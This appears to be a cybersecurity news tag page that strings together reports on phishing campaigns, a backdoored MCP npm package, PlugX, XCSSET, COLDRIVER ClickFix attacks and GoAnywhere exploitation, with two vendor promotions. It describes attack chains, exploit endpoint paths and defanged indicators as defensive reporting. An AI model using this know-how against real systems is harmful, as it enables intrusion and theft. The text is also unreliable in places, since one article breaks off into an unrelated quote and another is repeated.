Tag: Cyber Security

Security leaders are embracing AI for triage, detection engineering, and threat hunting as alert volumes and burnout hit breaking points.

A comprehensive survey of 282 security leaders at companies across industries reveals a stark reality facing modern Security Operations Centers: alert volumes have reached unsustainable levels, forcing teams to leave critical threats uninvestigated. You can download the full report here. The research, conducted primarily among US-based organizations, shows that AI adoption in security operations has shifted from experimental to essential as teams struggle to keep pace with an ever-growing stream of security alerts.

The findings paint a picture of an industry at a tipping point, where traditional SOC models are buckling under operational pressure and AI-powered solutions are emerging as the primary path forward.

Alert Volume Reaches Breaking Point

Security teams are drowning in alerts, with organizations processing an average of 960 alerts per day. Large enterprises face an even more daunting reality, handling over 3,000 daily alerts from an average of 30 different alert-generating security tools.

This volume creates a fundamental operational crisis where security teams must make difficult detection and investigation decisions under extreme time pressure. The survey reveals that alert fatigue has evolved beyond an emotional burden to become a measurable operational risk.

Investigations Remain Slow and Manual

The sheer mathematics of alert processing exposes the problem’s scale. The survey results revealed that it takes an average of 70 minutes to fully investigate an alert, that is, if someone can find the time to look at it. According to the survey, a full 56 minutes pass on average before anyone acts on an alert. This impossibility forces difficult choices about which alerts receive attention and which get ignored.

The survey results have unequivocally demonstrated a critical and well-known challenge within Security Operations Centers (SOCs): the sheer volume of alerts generated daily far exceeds the capacity of human analysts to investigate them thoroughly. Compounding the problem, modern security stacks and data sources continue to grow in number and complexity, leading to longer investigation times.

For high-priority incidents requiring immediate attention, these timeframes represent unacceptable delays that can compound breach severity. According to the latest CrowdStrike Cyber Threat Report, it only takes 48 minutes on average for a cyber threat like a Business Email Compromise to result in an incident.

The Hidden Cost of Overwhelmed SOCs

This overwhelming influx creates an impossible dilemma, forcing SOC teams to make difficult and often risky choices about which alerts receive attention and which are, by necessity, ignored. The consequence of this impossible situation is a heightened risk of missing genuine threats amidst the noise, ultimately compromising an organization’s security posture.

40% of security alerts go completely uninvestigated due to volume and resource constraints. Even more troubling, 61% of security teams admitted to ignoring alerts that later proved to be critical security incidents.

This statistic represents a fundamental breakdown in security operations. Teams designed to protect organizations are systematically unable to examine nearly half of the potential threats they detect. The survey reveals that this isn’t negligence but rather a forced adaptation to impossible workload demands.

SOC Teams Struggle with 24/7 Operations

The survey exposes critical gaps in round-the-clock security coverage. Many organizations lack sufficient staffing to maintain effective 24/7 SOC operations, creating vulnerability windows during off-hours when skeleton crews handle the same alert volumes that overwhelm full-strength day shifts.

Analyst burnout has become a quantifiable problem rather than just an HR concern. Teams report that suppressing detection rules has become a default coping mechanism when alert volumes become unmanageable. This approach reduces immediate workload but potentially creates blind spots in security coverage.

The staffing challenges are compounded by the specialized nature of security analysis work. Organizations cannot easily scale their teams to match alert volume growth, particularly given the shortage of experienced cybersecurity professionals in the current job market.

AI transitions from experiment to strategic priority

AI for security operations has rapidly climbed the priority ladder, now ranking as a top-three initiative alongside core security programs like cloud security and data security. This signals a fundamental shift in how security leaders view AI as a critical enabler for operational success today.

Currently, 55% of security teams already deploy AI copilots and assistants in production to support alert triage and investigation workflows.

The next wave of adoption is coming fast. Among teams not yet using AI, 60% plan to evaluate AI-powered SOC solutions within the year. And looking ahead, 60% of all SOC workloads are expected to be handled by AI in the next three years, according to the survey.

Organizations seek AI for core investigative tasks

Security teams have identified where AI can make the biggest immediate difference. Triage tops the list at 67%, followed closely by detection tuning (65%) and threat hunting (64%).

These priorities reflect a growing desire to apply AI to the early stages of investigation and surfacing meaningful alerts while providing initial context, and offloading repetitive analysis. It’s not about automating away human judgment, but about accelerating workflows and sharpening human focus.

Barriers Remain but Momentum is Clear

Despite strong adoption intentions, security leaders identify meaningful barriers to AI implementation. Data privacy concerns, integration complexity, and explainability requirements top the list of organizational hesitations.

The Future SOC Takes Shape

The survey data reveals a clear trajectory toward hybrid security operations where AI handles routine analysis tasks and human analysts focus on complex investigations and strategic decision-making. This evolution promises to address both the volume problem and analyst burnout simultaneously.

Success metrics for this transformation will likely center on operational efficiency improvements. Organizations will measure progress through reduced Mean Time to Investigation (MTTI) and Mean Time to Response (MTTR) in addition to traditional alert closure rates. Other meaningful success metrics include using AI to upskill and train new SOC Analyst and dramatically accelerate ramp up time.

By ensuring comprehensive alert coverage through AI augmentation, organizations can reduce the risk tolerance currently forced by volume constraints. The future SOC will investigate more alerts more thoroughly while requiring less manual effort from human analysts.

How Prophet Security Helps Customers

Prophet Security helps organizations move beyond manual investigations and alert fatigue with an agentic AI SOC platform that automates triage, accelerates investigations, and ensures every alert gets the attention it deserves. By integrating across the existing stack, Prophet AI improves analyst efficiency, reduces incident dwell time, and delivers more consistent security outcomes. Security leaders use Prophet AI to maximize the value of their people and tools, strengthen their security posture, and turn daily SOC operations into measurable business results. Visit Prophet Security to learn more or request a demo and see how Prophet AI can elevate your SOC operations.

Microsoft is calling attention to a new phishing campaign primarily aimed at U.S.-based organizations that has likely utilized code generated using large language models (LLMs) to obfuscate payloads and evade security defenses.

“Appearing to be aided by a large language model (LLM), the activity obfuscated its behavior within an SVG file, leveraging business terminology and a synthetic structure to disguise its malicious intent,” the Microsoft Threat Intelligence team said in an analysis published last week.

The activity, detected on August 28, 2025, shows how threat actors are increasingly adopting artificial intelligence (AI) tools into their workflows, often with the goal of crafting more convincing phishing lures, automating malware obfuscation, and generating code that mimics legitimate content.

In the attack chain documented by the Windows maker, bad actors have been observed leveraging an already compromised business email account to send phishing messages to steal victims’ credentials. The messages feature lure masquerading as a file-sharing notification to entice them into opening what ostensibly appears to be a PDF document, but, in reality, is a Scalable Vector Graphics (SVG) file.

What’s notable about the messages is that the attackers make use of a self-addressed email tactic, where the sender and recipient addresses match, and the actual targets were hidden in the BCC field so as to bypass basic detection heuristics.

“SVG files (Scalable Vector Graphics) are attractive to attackers because they are text-based and scriptable, allowing them to embed JavaScript and other dynamic content directly within the file,” Microsoft said. “This makes it possible to deliver interactive phishing payloads that appear benign to both users and many security tools.”

On top of that, the fact that SVG file format supports features such as invisible elements, encoded attributes, and delayed script execution makes it ideal for adversaries looking to sidestep static analysis and sandboxing, it added.

The SVG file, once launched, redirects the user to a page that serves a CAPTCHA for security verification, completing which, they are likely taken to a fake login page to harvest their credentials. Microsoft said the exact next stage is unclear due to its systems flagging and neutralizing the threat.

But where the attack stands apart is when it comes to its unusual obfuscation approach that uses business-related language to disguise the phishing content in the SVG file — a sign that it may have been generated using an LLM.

“The second stage .DLL file from memory uses heavily obfuscated packing and encryption techniques,” Forcepoint said. “This second stage .DLL file loaded another .DLL file in memory again using reflective DLL injection which was further responsible for final execution of malware.”

“The next and final step performs a process injection in its own main executable file, maintaining persistence and exfiltrating data to its command-and-control servers. The C2s where data was exfiltrated was found to be related to XWorm family.”

In recent weeks, phishing attacks have also employed lures related to the U.S. Social Security Administration and copyright infringement to distribute ScreenConnect ConnectWise and information stealers such as Lone None Stealer and PureLogs Stealer, respectively, per Cofense.

“The campaign typically spoofs various legal firms claiming to request the takedown of copyright-infringing content on the victim’s website or social media page,” the email security company said of the second set of attacks. “This campaign is notable for its novel use of a Telegram bot profile page to deliver its initial payload, obfuscated compiled Python script payloads, and evolving complexity as seen through multiple iterations of campaign samples.”

Sep 29, 2025Ravie LakshmananMCP Server / Vulnerability

Cybersecurity researchers have discovered what has been described as the first-ever instance of a Model Context Protocol (MCP) server spotted in the wild, raising software supply chain risks.

According to Koi Security, a legitimate-looking developer managed to slip in rogue code within an npm package called “postmark-mcp” that copied an official Postmark Labs library of the same name. The malicious functionality was introduced in version 1.0.16, which was released on September 17, 2025.

The actual “postmark-mcp” library, available on GitHub, exposes an MCP server to allow users to send emails, access and use email templates, and track campaigns using artificial intelligence (AI) assistants.

The npm package in question has since been deleted from npm by the developer “phanpak,” who uploaded it to the repository on September 15, 2025, and maintains 31 other packages. The JavaScript library attracted a total of 1,643 downloads.

“Since version 1.0.16, it’s been quietly copying every email to the developer’s personal server,” Koi Security Chief Technology Officer Idan Dardikman said. “This is the world’s first sighting of a real-world malicious MCP server. The attack surface for endpoint supply chain attacks is slowly becoming the enterprise’s biggest attack surface.”

The malicious package is a replica of the original library, save for a one-line change added in version 1.0.16 that essentially forwards every email sent using the MCP server to the email address “phan@giftshop[.]club” by BCC’ing it, potentially exposing sensitive communications.

“The postmark-mcp backdoor isn’t sophisticated – it’s embarrassingly simple,” Dardikman said. “But it perfectly demonstrates how completely broken this whole setup is. One developer. One line of code. Thousands upon thousands of stolen emails.”

Developers who have installed the npm package are recommended to immediately remove it from their workflows, rotate any credentials that may have been exposed through email, and review email logs for BCC traffic to the reported domain.

“MCP servers typically run with high trust and broad permissions inside agent toolchains. As such, any data they handle can be sensitive (password resets, invoices, customer communications, internal memos, etc.),” Snyk said. “In this case, the backdoor in this MCP Server was built with the intention to harvest and exfiltrate emails for agentic workflows that relied on this MCP Server.”

The findings illustrate how threat actors continue to abuse the user trust associated with the open-source ecosystem and the nascent MCP ecosystem to their advantage, especially when they are rolled out in business critical environments without adequate guardrails.

Sep 26, 2025Ravie LakshmananMalware / Cryptocurrency

A new campaign has been observed impersonating Ukrainian government agencies in phishing attacks to deliver CountLoader, which is then used to drop Amatera Stealer and PureMiner.

“The phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments,” Fortinet FortiGuard Labs researcher Yurren Wan said in a report shared with The Hacker News.

In the attack chains documented by the cybersecurity company, the SVG files are used to initiate the download of a password-protected ZIP archive, which contains a Compiled HTML Help (CHM) file. The CHM file, when launched, activates a chain of events that culminate in the deployment of CountLoader. The email messages claim to be a notice from the National Police of Ukraine.

CountLoader, which was the subject of a recent analysis by Silent Push, has been found to drop various payloads like Cobalt Strike, AdaptixC2, and PureHVNC RAT. In this attack chain, however, it serves as a distribution vector for Amatera Stealer, a variant of ACRStealer, and PureMiner, a stealthy .NET cryptocurrency miner.

Amatera Stealer, once launched, gathers system information, collects files matching a predefined list of extensions, and harvests data from Chromium- and Gecko-based browsers, as well as applications like Steam, Telegram, FileZilla, and various cryptocurrency wallets.

“This phishing campaign demonstrates how a malicious SVG file can act as an HTML substitute to initiate an infection chain,” Fortinet said. In this case, attackers targeted Ukrainian government entities with emails containing SVG attachments. The SVG-embedded HTML code redirected victims to a download site.”

The development comes as Huntress uncovered a likely Vietnamese-speaking threat group using phishing emails bearing copyright infringement notice themes to trick recipients into launching ZIP archives that lead to the deployment of PXA Stealer, which then evolves into a multi-layered infection sequence dropping PureRAT.

“This campaign demonstrates a clear and deliberate progression, starting with a simple phishing lure and escalating through layers of in-memory loaders, defense evasion, and credential theft,” security researcher James Northey said. “The final payload, PureRAT, represents the culmination of this effort: a modular, professionally developed backdoor that gives the attacker complete control over a compromised host.”

“Their progression from amateurish obfuscation of their Python payloads to abusing commodity malware like PureRAT shows not just persistence, but also hallmarks of a serious and maturing operator.”

Sep 27, 2025Ravie LakshmananMalware / Network Security

Telecommunications and manufacturing sectors in Central and South Asian countries have emerged as the target of an ongoing campaign distributing a new variant of a known malware called PlugX (aka Korplug or SOGU).

“The new variant’s features overlap with both the RainyDay and Turian backdoors, including abuse of the same legitimate applications for DLL side-loading, the XOR-RC4-RtlDecompressBuffer algorithm used to encrypt/decrypt payloads and the RC4 keys used,” Cisco Talos researchers Joey Chen and Takahiro Takeda said in an analysis published this week.

The cybersecurity company noted that the configuration associated with the PlugX variant diverges significantly from the usual PlugX configuration format, instead adopting the same structure used in RainyDay, a backdoor associated with a China-linked threat actor known as Lotus Panda (aka Naikon APT). It’s also likely tracked by Kaspersky as FoundCore and attributed to a Chinese-speaking threat group it calls Cycldek.

PlugX is a modular remote access trojan (RAT) widely used by many China-aligned hacking groups, but most prominently by Mustang Panda (aka BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, Red Lich, Stately Taurus, TEMP.Hex, and Twill Typhoon).

Turian (aka Quarian or Whitebird), on the other hand, is assessed to be a backdoor exclusively employed in cyber attacks targeting the Middle East by another advanced persistent threat (APT) group with ties to China referred to as BackdoorDiplomacy (aka CloudComputating or Faking Dragon).

The victimology patterns – particularly the focus on telecommunications companies – and technical malware implementation had yielded evidence suggesting likely connections between Lotus Panda and BackdoorDiplomacy, raising the possibility that either the two clusters are one and the same, or that they are obtaining their tools from a common vendor.

In one incident detected by the company, Naikon is said to have targeted a telecom firm in Kazakhstan, a country that shares its borders with Uzbekistan, which has been previously singled out by BackdoorDiplomacy. What’s more, both hacking crews have been found to zero in on South Asian countries.

The attack chains essentially involve abusing a legitimate executable associated with Mobile Popup Application to sideload a malicious DLL that’s then used to decrypt and launch PlugX, RainyDay, and Turian payloads in memory. Recent attack waves orchestrated by the threat actor have heavily leaned on PlugX, which uses the same configuration structure as RainyDay and includes an embedded keylogger plugin.

“While we cannot conclude that there is a clear connection between Naikon and BackdoorDiplomacy, there are significant overlapping aspects – such as the choice of targets, encryption/decryption payload methods, encryption key reuse and use of tools supported by the same vendor,” Talos said. “These similarities suggest a medium confidence link to a Chinese-speaking actor in this campaign.”

Mustang Panda’s Bookworm Malware Detailed

The disclosure comes as Palo Alto Networks Unit 42 sheds light on the inner workings of the Bookworm malware used by the Mustang Panda actor since 2015 to gain extensive control over compromised systems. The advanced RAT comes fitted with capabilities to execute arbitrary commands, upload/download files, exfiltrate data, and establish persistent access.

Earlier this March, the cybersecurity vendor said it identified attacks targeting countries affiliated with the Association of Southeast Asian Nations (ASEAN) to distribute the malware.

Bookworm utilizes legitimate-looking domains or compromised infrastructure for C2 purposes so as to blend in with normal network traffic. Select variants of the malware have also been found to share overlaps with TONESHELL, a known backdoor associated with Mustang Pana since late 2022.

Like PlugX and TONESHELL, attack chains distributing Bookworm rely on DLL side-loading for payload execution, although newer variants have embraced a technique that involves packaging shellcode as universally unique identifier (UUID) strings, which are then decoded and executed.

“Bookworm is known for its unique modular architecture, allowing its core functionality to be expanded by loading additional modules directly from its command-and-control (C2) server,” Unit 42 researcher Kyle Wilhoit said. “This modularity makes static analysis more challenging, as the Leader module relies on other DLLs to provide specific functionality.”

“This deployment and adaptation of Bookworm, running in parallel with other Stately Taurus operations, showcases its long-term role in the actor’s arsenal. It also points to a sustained, long-term commitment to its development and use by the group.”

Sep 26, 2025Ravie LakshmananMalware / Cryptocurrency

A new campaign has been observed impersonating Ukrainian government agencies in phishing attacks to deliver CountLoader, which is then used to drop Amatera Stealer and PureMiner.

“The phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments,” Fortinet FortiGuard Labs researcher Yurren Wan said in a report shared with The Hacker News.

In the attack chains documented by the cybersecurity company, the SVG files are used to initiate the download of a password-protected ZIP archive, which contains a Compiled HTML Help (CHM) file. The CHM file, when launched, activates a chain of events that culminate in the deployment of CountLoader. The email messages claim to be a notice from the National Police of Ukraine.

CountLoader, which was the subject of a recent analysis by Silent Push, has been found to drop various payloads like Cobalt Strike, AdaptixC2, and PureHVNC RAT. In this attack chain, however, it serves as a distribution vector for Amatera Stealer, a variant of ACRStealer, and PureMiner, a stealthy .NET cryptocurrency miner.

It’s worth pointing out that both PureHVNC RAT and PureMiner are part of a broader malware suite developed by a threat actor known as PureCoder. Some of the other products from the same author include –

• PureCrypter, a crypter for Native and .NET
• PureRAT (aka ResolverRAT), a successor to PureHVNC RAT
• PureLogs, an information stealer and logger
• BlueLoader, a malware that can act as a botnet by downloading and executing payloads remotely
• PureClipper, a clipper malware that substitutes cryptocurrency addresses copied into the clipboard with attacker-controlled wallet addresses to redirect transactions and steal funds

According to Fortinet, Amatera Stealer and PureMiner are both deployed as fileless threats, with the malware “executed via .NET Ahead-of-Time (AOT) compilation with process hollowing or loaded directly into memory using PythonMemoryModule.”

Amatera Stealer, once launched, gathers system information, collects files matching a predefined list of extensions, and harvests data from Chromium- and Gecko-based browsers, as well as applications like Steam, Telegram, FileZilla, and various cryptocurrency wallets.

“This phishing campaign demonstrates how a malicious SVG file can act as an HTML substitute to initiate an infection chain,” Fortinet said. In this case, attackers targeted Ukrainian government entities with emails containing SVG attachments. The SVG-embedded HTML code redirected victims to a download site.”

The development comes as Huntress uncovered a likely Vietnamese-speaking threat group using phishing emails bearing copyright infringement notice themes to trick recipients into launching ZIP archives that lead to the deployment of PXA Stealer, which then evolves into a multi-layered infection sequence dropping PureRAT.

“This campaign demonstrates a clear and deliberate progression, starting with a simple phishing lure and escalating through layers of in-memory loaders, defense evasion, and credential theft,” security researcher James Northey said. “The final payload, PureRAT, represents the culmination of this effort: a modular, professionally developed backdoor that gives the attacker complete control over a compromised host.”

“Their progression from amateurish obfuscation of their Python payloads to abusing commodity malware like PureRAT shows not just persistence, but also hallmarks of a serious and maturing operator.”

The Russian advanced persistent threat (APT) group known as COLDRIVER has been attributed to a fresh round of ClickFix-style attacks designed to deliver two new “lightweight” malware families tracked as BAITSWITCH and SIMPLEFIX.

Zscaler ThreatLabz, which detected the new multi-stage ClickFix campaign earlier this month, described BAITSWITCH as a downloader that ultimately drops SIMPLEFIX, a PowerShell backdoor.

COLDRIVER, also tracked as Callisto, Star Blizzard, and UNC4057, is the moniker assigned to a Russia-linked threat actor that’s known to target a wide range of sectors since 2019. While early campaign waves were observed using spear-phishing lures to direct targets to credential harvesting pages, the group has been fleshing out its arsenal with custom tools like SPICA and LOSTKEYS, which underscores its technical sophistication.

The adversary’s use of ClickFix tactics was previously documented by the Google Threat Intelligence Group (GTIG) back in May 2025, using fake sites serving fake CAPTCHA verification prompts to trick the victim into executing a PowerShell command that’s designed to deliver the LOSTKEYS Visual Basic Script.

“The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced,” Zscaler security researchers Sudeep Singh and Yin Hong Chang said in a report published this week.

The latest attack chain follows the same modus operandi, tricking unsuspecting users into running a malicious DLL in the Windows Run dialog under the guise of completing a CAPTCHA check. The DLL, BAITSWITCH, reaches out to an attacker-controlled domain (“captchanom[.]top”) to fetch the SIMPLEFIX backdoor, while a decoy document hosted on Google Drive is presented to the victims.

It also makes several HTTP requests to the same server to send system information, receive commands to establish persistence, store encrypted payloads in the Windows Registry, download a PowerShell stager, clear the most recent command executed in the Run dialog, effectively erasing traces of the ClickFix attack that triggered the infection.

The downloaded PowerShell stager subsequently reaches out to an external server (“southprovesolutions[.]com”) to download SIMPLEFIX, which, in turn, establishes communication with a command-and-control (C2) server to run PowerShell scripts, commands, and binaries hosted on remote URLs.

One of the PowerShell scripts executed via SIMPLEFIX exfiltrates information about a hard-coded list of file types found in a pre-configured list of directories. The list of directories and file extensions scanned shares overlaps with that of LOSTKEYS.

“The COLDRIVER APT group is known for targeting members of NGOs, human right defenders, think tanks in Western regions, as well as individuals exiled from and residing in Russia,” Zscaler said. “The focus of this campaign closely aligns with their victimology, which targets members of civil society connected to Russia.”

BO Team and Bearlyfy Target Russia

The development comes as Kaspersky said it observed a new phishing campaign targeting Russian companies in early September undertaken by the BO Team group (aka Black Owl, Hoody Hyena, and Lifting Zmiy) using password-protected RAR archives to deliver a new version of BrockenDoor rewritten in C# and an updated version of ZeronetKit.

A Golang backdoor, ZeronetKit, comes fitted with capabilities to support remote access to compromised hosts, upload/download files, execute commands using cmd.exe, and create a TCP/IPv4 tunnel. Select newer versions also incorporate support for downloading and running shellcode, as well as update the communication interval with C2 and modify the C2 server list.

“ZeronetKit is unable to independently persist on an infected system, so attackers use BrockenDoor to copy the downloaded backdoor to startup,” the Russian cybersecurity vendor said.

It also follows the emergence of a new group called Bearlyfy that has used ransomware strains like LockBit 3.0 and Babuk in attacks targeting Russia, initially attacking smaller companies for smaller ransoms before graduating to bigger firms in the country starting April 2025, according to F6. As of August 2025, the group is estimated to have claimed at least 30 victims.

In one incident targeting a consulting company, the threat actors have been observed weaponizing a vulnerable version of Bitrix for initial access, followed by using the Zerologon flaw to escalate privileges. In another case observed in July, the initial access is said to have been facilitated through an unnamed partner company.

“In the most recent recorded attack, the attackers demanded €80,000 in cryptocurrency, while in the first attack, the ransom was several thousand dollars,” F6 researchers said. “Due to the relatively low ransom amounts, on average, every fifth victim buys decryptors from the attackers.”

Bearlyfy is assessed to be active since January 2025, with a deeper analysis of its tools uncovering infrastructure overlaps with a likely pro-Ukrainian threat group called PhantomCore, which has a track record of targeting Russian and Belarusian companies since 2022. Despite these similarities, Bearlyfy is believed to be an autonomous entity.

“PhantomCore implements complex, multi-stage attacks typical of APT campaigns,” the company said. “Bearlyfy, on the other hand, uses a different model: attacks with minimal preparation and a targeted focus on achieving an immediate effect. Initial access is achieved through exploitation of external services and vulnerable applications. The primary toolkit is aimed at encryption, destruction, or modification of data.”

Sep 26, 2025The Hacker NewsSecurity Validation / Enterprise Security

Car makers don’t trust blueprints. They smash prototypes into walls. Again and again. In controlled conditions.

Because design specs don’t prove survival. Crash tests do. They separate theory from reality. Cybersecurity is no different. Dashboards overflow with “critical” exposure alerts. Compliance reports tick every box.

But none of that proves what matters most to a CISO:

• The ransomware crew targeting your sector can’t move laterally once inside.
• That a newly published exploit of a CVE won’t bypass your defenses tomorrow morning.
• That sensitive data can’t be siphoned through a stealthy exfiltration channel, exposing the business to fines, lawsuits, and reputational damage.

That’s why Breach and Attack Simulation (BAS) matters.

BAS is the crash test for your security stack. It safely simulates real adversarial behaviors to prove which attacks your defenses can stop, and which would break through. It exposes those gaps before attackers exploit them or regulators demand answers.

The Illusion of Safety: Dashboards Without Crash Tests

Dashboards overflowing with exposures can feel reassuring, like you’re seeing everything, like you’re safe. But it’s a false comfort. It’s no different than reading a car’s spec sheet and declaring it “safe” without ever crashing it into a wall at 60 miles per hour. On paper, the design holds. In practice, impact reveals where the frame buckles and the airbags fail.

The Blue Report 2025 provides crash test data for enterprise security. Based on 160 million adversary simulations, it shows what actually happens when defenses are tested instead of assumed:

• Prevention dropped from 69% to 62% in one year. Even organizations with mature controls regressed.
• 54% of attacker behaviors generated no logs. Entire attack chains unfolded with zero visibility.
• Only 14% triggered alerts. Meaning most detection pipelines failed silently.
• Data exfiltration was stopped just 3% of the time. A stage with direct financial, regulatory, and reputational consequences is effectively unprotected.

These are not gaps dashboards reveal. They are exploitable weaknesses that only appear under pressure.

Just as a crash test exposes flaws hidden in design blueprints, security validation exposes the assumptions that collapse under real-world impact, before attackers, regulators, or customers do.

And when paired with prioritization models like the Picus Exposure Score (PXS), the clarity becomes sharper:

• From 63% of vulnerabilities flagged as high/critical, only 10% remain truly critical after validation, an 84% reduction in false urgency.

For CISOs, this means fewer sleepless nights over swelling dashboards and more confidence that resources are locked onto exposures that matter most.

BAS turns overwhelming data into a validated risk picture executives can trust.

Closing Thought: Don’t Just Monitor, Simulate

For CISOs, the challenge isn’t visibility, it’s certainty. Boards don’t ask for dashboards or scanner scores. They want assurance that defenses will hold when it matters most.

This is where BAS reframes the conversation: from posture to proof.

• From “We deployed a firewall” → to “We proved it blocked malicious C2 traffic across 500 simulated attempts this quarter.”
• From “Our EDR has MITRE coverage” → to “We detected 72% of emulated Scattered Spider APT group’s behaviors; here’s where we fixed the other 28%.”
• From “We’re compliant” → to “We’re resilient, and we can prove it with evidence.”

That shift is why BAS resonates at the executive level. It transforms security from assumptions into measurable outcomes. Boards don’t buy posture, they buy proof.

And BAS is evolving further. With AI, it’s no longer just proving whether defenses worked yesterday, but anticipating how they will hold tomorrow.

To see this in action, join Picus Security, SANS, Hacker Valley, and other leading voices at The Picus BAS Summit 2025: Redefining Attack Simulation through AI. This virtual summit will showcase how BAS and AI together are shaping the future of security validation.

[Secure your spot today]

Sep 26, 2025Ravie LakshmananMalware / Browser Security

Cybersecurity researchers have discovered an updated version of a known Apple macOS malware called XCSSET that has been observed in limited attacks.

“This new variant of XCSSET brings key changes related to browser targeting, clipboard hijacking, and persistence mechanisms,” the Microsoft Threat Intelligence team said in a Thursday report.

“It employs sophisticated encryption and obfuscation techniques, uses run-only compiled AppleScripts for stealthy execution, and expands its data exfiltration capabilities to include Firefox browser data. It also adds another persistence mechanism through LaunchDaemon entries.”

XCSSET is the name assigned to a sophisticated modular malware that’s designed to infect Xcode projects used by software developers and unleash its malicious capabilities when it’s being built. Exactly how the malware is distributed remains unclear, but it’s suspected that the propagation relies on the Xcode project files being shared among developers building apps for macOS.

Earlier this March, Microsoft uncovered several enhancements to the malware, highlighting its improved error handling and the use of three different persistence techniques to siphon sensitive data from compromised hosts.

The latest variant of XCSSET has been found to incorporate a clipper sub-module that monitors clipboard content for specific regular expression (aka regex) patterns matching various cryptocurrency wallets. In the event of a match, the malware proceeds to substitute the wallet address in the clipboard with an attacker-controlled one to reroute transactions.

The Windows maker also noted that the new iteration introduces changes to the fourth stage of the infection chain, particularly where an AppleScript application is used to run a shell command to fetch the final-stage AppleScript that’s responsible for collecting system information and launching various sub-modules using a boot() function.

Notably, the modifications include extra checks for the Mozilla Firefox browser and an altered logic to determine the presence of the Telegram messaging app. Also observed are changes to the various modules, as well as new modules that did not exist in previous versions –

• vexyeqj, the information module previously called seizecj, and which downloads a module called bnk that’s run using osascript. The script defines functions for data validation, encryption, decryption, fetching additional data from command-and-control (C2) server, and logging. It also includes the clipper functionality.
• neq_cdyd_ilvcmwx, a module similar to txzx_vostfdi that exfiltrates files to the C2 server
• xmyyeqjx, a module to set up LaunchDaemon-based persistence
• jey, a module to set up Git-based persistence
• iewmilh_cdyd, a module to steal data from Firefox using a modified version of a publicly available tool named HackBrowserData

To mitigate the threat posed by XCSSET, users are recommended to ensure that they keep their system up-to-date, inspect Xcode projects downloaded or cloned from repositories or other sources, and exercise caution when it comes to copying and pasting sensitive data from the clipboard.

Sep 26, 2025Ravie LakshmananVulnerability / Threat Intelligence

Cybersecurity company watchTowr Labs has disclosed that it has “credible evidence” of active exploitation of the recently disclosed security flaw in Fortra GoAnywhere Managed File Transfer (MFT) software as early as September 10, 2025, a whole week before it was publicly disclosed.

“This is not ‘just’ a CVSS 10.0 flaw in a solution long favored by APT groups and ransomware operators – it is a vulnerability that has been actively exploited in the wild since at least September 10, 2025,” Benjamin Harris, CEO and Founder of watchTowr, told The Hacker News.

The vulnerability in question is CVE-2025-10035, which has been described as a deserialization vulnerability in the License Servlet that could result in command injection without authentication. Fortra GoAnywhere version 7.8.4, or the Sustain Release 7.6.3, was released by Fortra last week to remediate the problem.

According to an analysis released by watchTowr earlier this week, the vulnerability has to do with the fact that it’s possible to send a crafted HTTP GET request to the “/goanywhere/license/Unlicensed.xhtml/” endpoint to directly interact with the License Servlet (“com.linoma.ga.ui.admin.servlet.LicenseResponseServlet”) that’s exposed at “/goanywhere/lic/accept/<GUID>” using the GUID embedded in the response to the earlier sent request.

Armed with this authentication bypass, an attacker can take advantage of inadequate deserialization protections in the License Servlet to result in command injection. That said, exactly how this occurs is something of a mystery, researchers Sonny Macdonald and Piotr Bazydlo noted.

Cybersecurity vendor Rapid7, which also released its findings into CVE-2025-10035, said it’s not a single deserialization vulnerability, but rather a chain of three separate issues –

• An access control bypass that has been known since 2023
• The unsafe deserialization vulnerability CVE-2025-10035, and
• An as-yet unknown issue pertaining to how the attackers can know a specific private key

In a subsequent report published Thursday, watchTowr said it received evidence of exploitation efforts, including a stack trace that enables the creation of a backdoor account. The sequence of the activity is as follows –

• Triggering the pre-authentication vulnerability in Fortra GoAnywhere MFT to achieve remote code execution (RCE)
• Using the RCE to create a GoAnywhere user named “admin-go”
• Using the newly created account to create a web user
• Leveraging the web user to interact with the solution and upload and execute additional payloads, including SimpleHelp and an unknown implant (“zato_be.exe”)

The cybersecurity company also said the threat actor activity originated from the IP address 155.2.190[.]197, which, according to VirusTotal, has been flagged for conducting brute-force attacks targeting Fortinet FortiGate SSL VPN appliances.

Given signs of in-the-wild exploitation, it’s imperative that users move quickly to apply the fixes, if not already. The Hacker News has reached out to Fortra for comment, and we will update the story if we hear back.